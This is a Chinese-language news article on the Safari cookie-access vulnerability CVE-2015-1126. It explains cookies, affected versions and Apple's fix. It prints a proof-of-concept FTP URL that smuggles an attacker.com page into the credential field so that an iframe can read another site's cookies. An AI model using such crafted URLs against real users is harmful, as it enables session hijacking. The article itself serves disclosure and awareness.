Safari瀏覽器cookie訪問漏洞影響數十億蘋果產品
存在于Safari瀏覽器中的一個cookie訪問漏洞(CVE-2015-1126)可能會影響數十億蘋果產品,如果你在使用Safari瀏覽器,一定要盡快檢測它是否受該漏洞影響,若受影響請盡快修復。
科普:cookie
Cookie,有時也用其復數形式Cookies,指某些網站為了辨別用戶身份、進行session跟蹤而儲存在用戶本地終端上的數據(通常經過加密)。Cookie可以保持登錄信息到用戶下次與服務器的會話,即下次訪問同一網站時,用戶不必再次輸入用戶名和密碼就可以登錄。
Cookies最典型的應用是判定注冊用戶是否已經登錄網站,用戶可能會得到提示,是否在下一次進入此網站時保留用戶信息以便簡化登錄手續,這些都是Cookies的功用。另一個重要應用場合是“購物車”之類處理,用戶可能會在一段時間內在同一家網站的不同頁面中選擇不同的商品,這些信息都會寫入Cookies,以便在最后付款時提取信息。
漏洞詳情
前段時間,芬蘭一家公司Klikki Oy的安全研究員Jouko Pynnönen發現了Safari瀏覽器中存在安全漏洞(CVE-2015-1126),該漏洞可能會影響數十億蘋果產品。該跨域漏洞會影響Safari的URL文件傳輸機制,攻擊者可以精心制作一個web網頁,當受害者訪問該頁面時,就可以繞過一些正常的跨域限制,然后訪問或操作任何網站的HTTP cookies。
Pynnönen在一份安全報告中寫道:
| “攻擊者可以精心編制一個web頁面,當目標網民訪問該頁面時,攻擊者就可以繞過一些正常的跨域限制從而訪問或操作任何網站的HTTP cookies。大多數允許用戶登錄的網站都會在cookies中存儲它們的認證信息(通常是會話ID等信息),攻擊者訪問這些cookies就可以劫持認證會話。在iOS、OS X和Windows系統上所有Safari的測試版本都受該漏洞影響,產品總量可能達到十億數量級。” |
研究人員解釋道,iOS 8.1、6.1.6及OS X 10.9.3和Windows8.1系統上的7.0.4和5.1.7版本的Safari瀏覽器都受到該漏洞的影響。
漏洞PoC URL
目前針對此漏洞,在URL中的用戶名或密碼字段編碼特殊字符就可能引發安全問題,示例鏈接如下所示。
ftp://user:password@host/path
當用戶名或密碼字段中包含編碼的特殊字符時,通過操作該URL,攻擊者可以下載目標網站的文檔資料。Pynnönen還提供了下面的示例PoC URL:
ftp://user%40attacker.com%2Fexploit.html%23@apple.com/
當受害者訪問該URL時,存在此漏洞的Safari瀏覽器會加載攻擊者所控制網站attacker.com上的exploit.html文件,之后攻擊者便會利用JavaScript訪問和操作apple.com網站的cookies。受影響的瀏覽器會將上面URL解碼成如下形式:
ftp://user@attacker.com/exploit.html#apple.com/
即在一個正常的web頁面中嵌入指向一個FTP URL的IFRAME,這樣就可以發起攻擊了。
漏洞已修復
該漏洞已經被蘋果公司修復,使用Safari瀏覽器的用戶可以使用Safari cookie漏洞檢測工具來檢測其瀏覽器是否受影響,若受影響一定要盡快修復它。
